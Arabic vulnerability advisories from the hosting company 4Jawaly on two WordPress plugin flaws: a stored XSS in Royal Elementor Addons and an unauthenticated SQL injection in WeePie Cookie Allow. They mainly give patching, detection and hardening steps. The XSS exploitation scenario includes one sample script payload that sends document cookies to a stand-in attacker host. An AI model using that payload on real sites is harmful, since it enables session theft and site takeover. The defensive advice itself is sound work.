شعار منصة فورجوالي الرسمي - خدمات الرسائل والواتساب والاستضافة

ثغرة في إضافة Royal Elementor Addons لـ WordPress: حقن سكربتات مُخزّنة عبر طلبات AJAX غير مُوثَّقة

مقدمة: تهديد جديد يطال آلاف المواقع السعودية المبنية على WordPress

في الخامس من مايو 2026، تم الإفصاح عن ثغرة أمنية خطيرة تحمل المعرّف CVE-2026-4803 تؤثر على إضافة Royal Elementor Addons الشهيرة لنظام إدارة المحتوى WordPress، وذلك بدرجة خطورة عالية (CVSS 7.2). الثغرة تصنّف ضمن فئة CWE-79 (Cross-Site Scripting) وتحديداً النوع المُخزَّن (Stored XSS)، وهو الأخطر لأنه يبقى كامناً في قاعدة البيانات ويُنفَّذ تلقائياً على كل زائر أو مسؤول.

ما يزيد من خطورة هذه الثغرة هو إمكانية استغلالها من قِبَل مهاجمين غير مُوثَّقين (Unauthenticated)، أي دون الحاجة لامتلاك حساب على الموقع، نظراً لتسرّب قيمة الـ nonce علناً، وهو ما يفتح الباب لحملات استغلال آلية واسعة النطاق تستهدف المواقع السعودية والخليجية.

تفاصيل الثغرة التقنية

تكمن الثغرة في معالج AJAX الخاص بالإجراء wpr_update_form_action_meta داخل ملف wpr-actions-status.php، حيث يتم استقبال قيمة المعامل status من المستخدم دون تنقية كافية للمدخلات (Input Sanitization) ودون تطبيق آلية هروب سليمة للمخرجات (Output Escaping).

العامل الأكثر خطورة هو أن قيمة nonce التحقق (المفترض أن تحمي الإجراء) مُسرَّبة بشكل علني في كود الواجهة الأمامية، مما يعني أن أي متصفح أو سكربت آلي يستطيع الحصول عليها بسهولة واستدعاء الـ AJAX endpoint باسم زائر غير مسجل الدخول.

سيناريو الاستغلال النموذجي:

  1. المهاجم يجلب قيمة nonce من صفحة تحتوي على نموذج Royal Elementor.
  2. يُرسل طلب POST إلى admin-ajax.php مع الإجراء wpr_update_form_action_meta.
  3. يحقن في معامل status كود JavaScript خبيث مثل <script>fetch('https://attacker.sa/steal?c='+document.cookie)</script>.
  4. الكود يُخزَّن في قاعدة البيانات، ويُنفَّذ في كل مرة يفتح فيها المسؤول لوحة إدارة النماذج أو المُرسلات.
  5. النتيجة: سرقة ملفات تعريف الارتباط، اختطاف الجلسات، تصعيد الصلاحيات إلى Administrator، ثم السيطرة الكاملة على الموقع.

الأنظمة والإصدارات المتأثرة

  • الإضافة: Royal Elementor Addons (المعروفة أيضاً بـ WPR Addons).
  • الإصدارات المتأثرة: جميع الإصدارات حتى 1.7.1056 (شاملة).
  • الإصدار المُصحَّح: 1.7.1057 فما فوق (يُنصح بالترقية الفورية).
  • البيئة: مواقع WordPress التي تستخدم Elementor مع هذه الإضافة، بما في ذلك المتاجر الإلكترونية ومواقع الأخبار والشركات.

لماذا يجب على مسؤولي الاستضافة في السعودية الانتباه؟

مسؤول سعودي يفحص ثغرة wordpress عبر AJAX تنقل سكربتات خبيثة لقاعدة البيانات

بحسب إحصائيات استخدام WordPress في المملكة العربية السعودية ودول الخليج، تعتمد نسبة كبيرة من المواقع التجارية والإعلامية على Elementor وإضافاته المساعدة، ومنها Royal Elementor Addons التي تتجاوز 300 ألف تثبيت نشط عالمياً. في السياق المحلي:

  • المواقع الحكومية وشبه الحكومية التي تخضع لإشراف هيئة الاتصالات والفضاء والتقنية (CST) والتي تتبنى معايير الأمن السيبراني الصادرة عن الهيئة الوطنية للأمن السيبراني (NCA) معرّضة لانتهاك الامتثال عند إهمال هذه الترقية.
  • متاجر التجارة الإلكترونية التي تعالج مدفوعات عبر مدى أو Apple Pay معرّضة لسرقة بيانات العملاء، مما يُعد انتهاكاً صريحاً لـ نظام حماية البيانات الشخصية (PDPL).
  • مزودو الاستضافة المحليون ومراكز البيانات السعودية يواجهون مخاطر تلويث سمعة شبكاتهم وإدراج نطاقاتهم في قوائم الحظر العالمية حال استغلال مواقع عملائهم لنشر برمجيات خبيثة.

الخطوات العملية الموصى بها لمسؤولي النظم

1. الترقية الفورية (الإجراء الأول والأهم)

مسؤول WordPress خليجي يراقب ثغرة XSS عبر AJAX بين التطبيق وقاعدة البيانات

قم بتحديث إضافة Royal Elementor Addons إلى أحدث إصدار (1.7.1057 أو أعلى) من لوحة تحكم WordPress مباشرة:

wp plugin update royal-elementor-addons --allow-root

2. الفحص الاستباقي للاختراق

قبل وبعد الترقية، افحص قاعدة البيانات بحثاً عن أي محتوى مشبوه:

SELECT * FROM wp_postmeta WHERE meta_key LIKE '%wpr%' AND meta_value LIKE '%<script%';
SELECT * FROM wp_options WHERE option_value LIKE '%onerror=%' OR option_value LIKE '%javascript:%';

3. تفعيل جدار حماية تطبيقات الويب (WAF)

قم بتفعيل قواعد WAF لحظر محاولات حقن XSS في طلبات admin-ajax.php، سواء عبر Cloudflare أو عبر حلول محلية مثل Wordfence أو Sucuri. خدمات الاستضافة السعودية المتوافقة مع معايير CST غالباً تقدم WAF مُدمجاً.

4. تدوير مفاتيح WordPress السرية

إذا اشتبهت بأن موقعك تعرّض للاستغلال، قم بتحديث مفاتيح wp-config.php لإبطال كل الجلسات النشطة:

define('AUTH_KEY', '...مفتاح جديد...');
define('SECURE_AUTH_KEY', '...');
// ... إلخ

5. مراجعة حسابات المسؤولين

تحقق من عدم وجود حسابات Administrator مشبوهة أُضيفت مؤخراً، وأعد تعيين كلمات المرور لجميع الحسابات ذات الصلاحيات العالية، مع تفعيل المصادقة الثنائية (2FA).

6. مراجعة سجلات الوصول

ابحث في سجلات خادم الويب عن طلبات POST مشبوهة إلى admin-ajax.php تحمل المعامل action=wpr_update_form_action_meta:

grep 'wpr_update_form_action_meta' /var/log/nginx/access.log | grep POST

إجراءات الحماية طويلة المدى

  • سياسة CSP صارمة: فعّل Content-Security-Policy لمنع تنفيذ السكربتات المُضمَّنة من مصادر غير موثوقة.
  • مبدأ الحد الأدنى من الإضافات: احذف كل إضافة غير مستخدمة، فكل إضافة هي سطح هجوم محتمل.
  • النسخ الاحتياطي اليومي: اعتمد على نسخ احتياطية مُشفَّرة ومُخزَّنة في مراكز بيانات سعودية مطابقة لمتطلبات SDAIA.
  • المراقبة المستمرة: استخدم أدوات مراقبة تغيّر الملفات (File Integrity Monitoring) للكشف عن أي تعديل غير مُصرَّح به.

مخاطر عدم الاستجابة السريعة

رجل بزي خليجي يفحص ثغرة WordPress مع أيقونة برمجية وتنبيه قاعدة بيانات

تجاهل هذه الثغرة قد يؤدي إلى:

  • اختطاف كامل للموقع وتحويله إلى منصة توزيع برمجيات خبيثة.
  • إدراج النطاق في قوائم Google Safe Browsing السوداء، مما يعني خسارة كاملة لحركة الزيارات العضوية.
  • غرامات مالية بموجب نظام حماية البيانات الشخصية السعودي قد تصل إلى 5 ملايين ريال.
  • فقدان شهادات الامتثال مثل ISO 27001 وPCI DSS.
  • تضرر سمعة العلامة التجارية وفقدان ثقة العملاء.

دور 4Jawaly في دعم أمان عملائها

في فورجوالي (4Jawaly)، المرخصة من هيئة الاتصالات والفضاء والتقنية (ترخيص 291-10-32) والحاصلة على شهادة ISO 27001، نولي أمان منصات الاستضافة لدينا أولوية قصوى. نوفر لعملائنا في قطاعات التجارة الإلكترونية والإعلام بيئات WordPress مُحصَّنة مع تحديثات تلقائية، جدران حماية تطبيقات ويب، ومراقبة على مدار الساعة، إلى جانب حلول إشعارات SMS وواتساب للتنبيه الفوري عند اكتشاف أنشطة مشبوهة على حسابات الإدارة.

خاتمة

ثغرة CVE-2026-4803 ليست مجرد خلل تقني عابر، بل تذكير صارم بأن أمان WordPress يعتمد على أضعف إضافة مُثبَّتة. مع وجود nonce مُسرَّب علناً وإمكانية الاستغلال من مهاجمين غير مسجلين، فإن الفترة الزمنية بين الإفصاح وموجة الاستغلال الآلي ستكون قصيرة جداً. نُوصي كل مسؤول نظم في المملكة والخليج بإجراء الترقية خلال 24 ساعة وإجراء فحص شامل للاختراق.

الأسئلة الأكثر شيوعاً

ما مدى خطورة ثغرة CVE-2026-4803؟
الخطورة عالية بتقييم CVSS 7.2، وما يزيدها خطورة أنها تسمح للمهاجمين غير المسجلين باستغلالها بسبب تسرّب nonce التحقق علناً، مما يجعل الاستغلال الآلي الجماعي ممكناً.
كيف أعرف إذا كان موقعي مُصاباً؟
افحص جدول wp_postmeta في قاعدة البيانات بحثاً عن قيم تحتوي على وسوم ، وراجع سجلات admin-ajax.php للبحث عن طلبات POST تحمل action=wpr_update_form_action_meta، وتحقق من عدم وجود حسابات Administrator مشبوهة.
ما الإصدار الآمن من إضافة Royal Elementor Addons؟
الإصدار 1.7.1057 فما فوق هو الإصدار المُصحَّح. جميع الإصدارات حتى 1.7.1056 مشمولة (شاملة) متأثرة بالثغرة.
هل يكفي تحديث الإضافة فقط؟
التحديث خطوة أساسية لكن غير كافية إذا كان الموقع قد استُغل بالفعل. يجب إجراء فحص شامل لقاعدة البيانات، تدوير مفاتيح wp-config.php، إعادة تعيين كلمات المرور، ومراجعة حسابات المسؤولين.
ما علاقة هذه الثغرة بنظام حماية البيانات الشخصية السعودي (PDPL)؟
إذا أدى استغلال الثغرة إلى تسريب بيانات شخصية لعملاء سعوديين، فإن ذلك يُعد انتهاكاً صريحاً لـ PDPL وقد يعرّض المنشأة لغرامات تصل إلى 5 ملايين ريال، إضافة إلى الالتزام بإبلاغ SDAIA خلال 72 ساعة.

ثغرة حقن SQL حرجة في إضافة WeePie Cookie Allow لـ WordPress

مقدمة: ثغرة SQL Injection تهدد آلاف مواقع WordPress في المملكة

كشف باحثو الأمن السيبراني عن ثغرة أمنية حرجة في إضافة WeePie Cookie Allow الخاصة بنظام إدارة المحتوى WordPress، تم تسجيلها تحت المعرّف CVE-2026-4304 بتقييم CVSS بلغ 7.5 (عالية الخطورة). تسمح هذه الثغرة لمهاجمين غير مُصادق عليهم بتنفيذ هجمات حقن SQL عبر وسيط consent، مما يُمكّنهم من استخراج بيانات حساسة من قاعدة بيانات الموقع بما في ذلك بيانات المستخدمين وكلمات المرور المُجزّأة والمعلومات الإدارية.

تُعدّ هذه الثغرة ذات أهمية بالغة للمسؤولين التقنيين في المملكة العربية السعودية ودول الخليج، خاصة مع الانتشار الواسع لإضافات الامتثال للخصوصية بعد صدور نظام حماية البيانات الشخصية السعودي (PDPL) الذي تُشرف عليه الهيئة السعودية للبيانات والذكاء الاصطناعي (SDAIA).

التفاصيل التقنية للثغرة

تنتمي هذه الثغرة إلى تصنيف CWE-89 المعروف بـ “التحييد غير الملائم للعناصر الخاصة المستخدمة في أوامر SQL”. يكمن جوهر المشكلة في أن الإضافة تستقبل قيمة وسيط consent من المستخدم دون تطبيق آليات التحييد (escaping) الكافية، ودون استخدام الاستعلامات المُعدّة مسبقاً (prepared statements) بشكل سليم.

كيف يعمل الهجوم؟

يستطيع المهاجم إرسال طلب HTTP مُعدّ خصيصاً يحتوي على أوامر SQL خبيثة داخل وسيط consent. نظراً لعدم وجود تصفية مناسبة، يتم إلحاق هذه الأوامر بالاستعلام الأصلي وتنفيذها مباشرة على قاعدة البيانات. يمكن للمهاجم عبر ذلك:

  • استخراج محتوى جدول wp_users الذي يحوي أسماء المستخدمين والبريد الإلكتروني وكلمات المرور المُجزّأة.
  • الوصول إلى جدول wp_options واستخراج مفاتيح API والإعدادات الحساسة.
  • قراءة بيانات العملاء والمعاملات المخزّنة في جداول مخصصة.
  • في بعض السيناريوهات، رفع الامتيازات والسيطرة الكاملة على الموقع.

خطورة كون الهجوم لا يتطلب مصادقة

ما يُضاعف من خطورة هذه الثغرة هو أنها لا تتطلب أي مصادقة (Unauthenticated)؛ أي أن أي زائر عابر للموقع، بما في ذلك البوتات الآلية، يمكنه استغلالها. هذا يجعل الثغرة مرشحة بقوة للاستغلال الجماعي عبر أدوات المسح الآلي مثل sqlmap وغيرها.

الأنظمة والإصدارات المتأثرة

  • الإضافة: WeePie Cookie Allow – Easy & Complete Cookie Consent Plugin
  • الإصدارات المتأثرة: جميع الإصدارات حتى 3.4.11 (شاملةً).
  • المنصة: WordPress (جميع إصدارات النواة).
  • الوسيط الثغري: consent
رسم يوضح هجوم حقن SQL على موقع WordPress مع اختراق قاعدة البيانات

الإضافة تُباع عبر منصة CodeCanyon ومُستخدمة على نطاق واسع من قِبل المواقع التي ترغب في الامتثال للوائح الخصوصية مثل GDPR الأوروبي و PDPL السعودي، مما يعني أن الضحايا المحتملين غالباً مواقع مؤسسية وحكومية وتجارية.

السياق المحلي: لماذا يجب على مسؤولي المواقع السعوديين الاهتمام؟

تشهد المملكة العربية السعودية تحولاً رقمياً متسارعاً ضمن رؤية 2030، ومع ذلك تواجه المواقع الإلكترونية المحلية تحديات أمنية متصاعدة. فيما يلي أبرز الاعتبارات المحلية:

1. الامتثال لنظام حماية البيانات الشخصية (PDPL)

بموجب نظام PDPL السعودي، يُعدّ تسرب البيانات الشخصية جريمة تستوجب غرامات قد تصل إلى 5 ملايين ريال سعودي، إضافة إلى التعويضات المدنية. استغلال هذه الثغرة يعني تسرب بيانات العملاء السعوديين، وهو ما يوقع المالك تحت طائلة العقوبة.

2. متطلبات هيئة الاتصالات والفضاء والتقنية (CST)

تُلزم هيئة الاتصالات والفضاء والتقنية (سابقاً CITC) مُزوّدي خدمات الاستضافة والمواقع بتطبيق ضوابط الأمن السيبراني الصادرة عن الهيئة الوطنية للأمن السيبراني (NCA)، بما في ذلك ضوابط ECC-1:2018، والتي تتطلب إدارة التحديثات الأمنية بشكل دوري.

3. الاستضافة المحلية ومراكز البيانات السعودية

كثير من المواقع السعودية تستضاف في مراكز بيانات محلية (مثل مراكز بيانات STC وموبايلي وشركات الاستضافة الخليجية)، وهذه البيئات تُعدّ هدفاً جذاباً للمهاجمين الإقليميين. يجب على مديري الاستضافة التنسيق مع العملاء لفرض التحديث الفوري.

خطوات الاستجابة الفورية لمسؤولي الاستضافة والمواقع

الخطوة 1: التحقق من وجود الإضافة

رسم لرجل سعودي أمام لابتوب مع هجوم حقن SQL يستهدف قاعدة بيانات WordPress

قم بتنفيذ الأمر التالي عبر SSH للبحث عن الإضافة في جميع مواقع WordPress المستضافة:

find /var/www -type d -name "weepie-cookie-allow" 2>/dev/null

الخطوة 2: التحديث الفوري

قم بترقية الإضافة إلى آخر إصدار متاح من خلال:

  1. الدخول إلى لوحة تحكم WordPress.
  2. الانتقال إلى الإضافات > الإضافات المثبتة.
  3. تحديث إضافة WeePie Cookie Allow.
  4. التحقق من سجل التغييرات على الموقع الرسمي weepie-plugins.com.

الخطوة 3: الحل المؤقت في حال تعذّر التحديث

إذا لم يتوفر إصدار مُصحّح بعد، يُنصح بما يلي:

  • تعطيل الإضافة مؤقتاً واستبدالها بحل بديل مثل CookieYes أو Complianz.
  • إضافة قاعدة على جدار الحماية التطبيقي (WAF) مثل Cloudflare أو Wordfence لحظر الطلبات التي تحتوي على أنماط SQL مشبوهة في وسيط consent.
  • تفعيل وضع القراءة فقط لقاعدة البيانات للمستخدم العام إن أمكن.

الخطوة 4: فحص علامات الاختراق

ابحث عن مؤشرات اختراق محتملة عبر:

  • مراجعة سجلات الوصول access.log بحثاً عن طلبات تحتوي على كلمات مثل UNION، SELECT، INFORMATION_SCHEMA في وسيط consent.
  • فحص جدول wp_users بحثاً عن حسابات مشرفين غير معروفة.
  • تشغيل أداة فحص مثل Wordfence Scanner أو Sucuri SiteCheck.
  • مراجعة ملفات الموقع بحثاً عن أبواب خلفية (backdoors) بامتدادات PHP حديثة التعديل.

الخطوة 5: تدوير بيانات الاعتماد

في حال الاشتباه بالاختراق:

  • تغيير كلمات مرور جميع الحسابات الإدارية.
  • تدوير مفاتيح WordPress الأمنية (Salts) في ملف wp-config.php.
  • إبطال جلسات المستخدمين الحالية عبر إضافة مثل All In One WP Security.
  • تغيير كلمة مرور قاعدة البيانات MySQL.

إجراءات وقائية طويلة المدى

1. تفعيل جدار حماية تطبيقات الويب (WAF)

يُعدّ نشر WAF من أهم الإجراءات الوقائية ضد هجمات حقن SQL. تُقدّم شركة فورجوالي (4Jawaly) حلول استضافة متقدمة مع حماية WAF مُدمجة، إضافة إلى خدمات المراقبة المستمرة.

2. المراقبة المستمرة للسجلات

استخدم حلول SIEM أو أدوات مفتوحة المصدر مثل Wazuh لرصد الأنماط الشاذة في سجلات الخادم.

3. النسخ الاحتياطي المنتظم

احرص على نسخ احتياطية يومية خارج الموقع، مع اختبار استعادتها دورياً.

4. مبدأ أقل الامتيازات لقاعدة البيانات

تأكد أن مستخدم MySQL المرتبط بـ WordPress لا يمتلك صلاحيات FILE أو SUPER التي تُسهّل على المهاجمين التعمّق.

5. التوعية والتدريب

درّب فرق تقنية المعلومات على أحدث تقنيات الاستجابة للحوادث، وتابع نشرات المركز الوطني الإرشادي للأمن السيبراني (HaSad).

تقييم المخاطر والتأثير المحتمل

الجانبالتقييم
سهولة الاستغلالعالية جداً – أدوات آلية متوفرة
متطلبات المصادقةلا توجد
التأثير على السريةمرتفع – تسرب بيانات كامل
التأثير على التوفرمنخفض إلى متوسط
احتمال الاستغلال الجماعيمرتفع جداً

خاتمة

رجل سعودي يستخدم لابتوب ووردبريس مع قاعدة بيانات مخترقة وهاكر يستغل ثغرة حقن SQL

ثغرة CVE-2026-4304 تُذكّرنا مجدداً بأن إضافات WordPress تظل الحلقة الأضعف في سلسلة أمن المواقع. يجب على كل مسؤول تقني في المملكة والخليج اتخاذ إجراء فوري للتحقق من وجود الإضافة المتأثرة وتحديثها أو استبدالها. الامتثال لنظام PDPL والضوابط الوطنية للأمن السيبراني ليس خياراً، بل ضرورة قانونية وتشغيلية.

للحصول على استشارات تقنية أو خدمات استضافة آمنة ومُحسّنة للسوق السعودي، يمكنك التواصل مع فريق فورجوالي المُرخّص من هيئة الاتصالات والفضاء والتقنية، والحاصل على شهادة ISO 27001 في إدارة أمن المعلومات.

الأسئلة الأكثر شيوعاً

ما مدى خطورة ثغرة CVE-2026-4304 على موقعي السعودي؟
الثغرة مُصنّفة عالية الخطورة بتقييم CVSS 7.5، ولا تتطلب مصادقة، مما يجعل أي موقع يستخدم إضافة WeePie Cookie Allow حتى الإصدار 3.4.11 عرضة لسرقة بيانات كاملة من قاعدة البيانات. في السياق السعودي قد يُعرّضك ذلك لعقوبات نظام PDPL.
كيف أعرف إن كان موقعي مُصاباً بهذه الإضافة؟
سجّل دخولك إلى لوحة WordPress وانتقل إلى قسم الإضافات وابحث عن WeePie Cookie Allow، أو نفّذ الأمر find عبر SSH للبحث في مجلد الإضافات. إذا كانت الإضافة موجودة بإصدار 3.4.11 أو أقل فأنت مُعرّض.
ما الحل السريع إذا لم يتوفر تحديث؟
قم بتعطيل الإضافة فوراً واستبدلها ببديل آمن مثل CookieYes، مع تفعيل جدار حماية تطبيقي (WAF) مثل Cloudflare أو Wordfence لحظر محاولات حقن SQL عبر وسيط consent.
هل استغلال هذه الثغرة يُخالف نظام PDPL السعودي؟
نعم؛ إذا تسببت الثغرة في تسرب بيانات شخصية لمواطنين أو مقيمين، فأنت كمسؤول عن البيانات قد تتعرض لغرامات قد تصل إلى 5 ملايين ريال بموجب نظام حماية البيانات الشخصية، إضافة إلى التزامات الإفصاح خلال 72 ساعة.
كيف تساعد فورجوالي في حماية مواقعي من مثل هذه الثغرات؟
تُقدّم فورجوالي خدمات استضافة آمنة مع جدار حماية WAF مُدمج، مراقبة مستمرة، نسخ احتياطي يومي، واستشارات أمنية متوافقة مع ضوابط الهيئة الوطنية للأمن السيبراني وشهادة ISO 27001.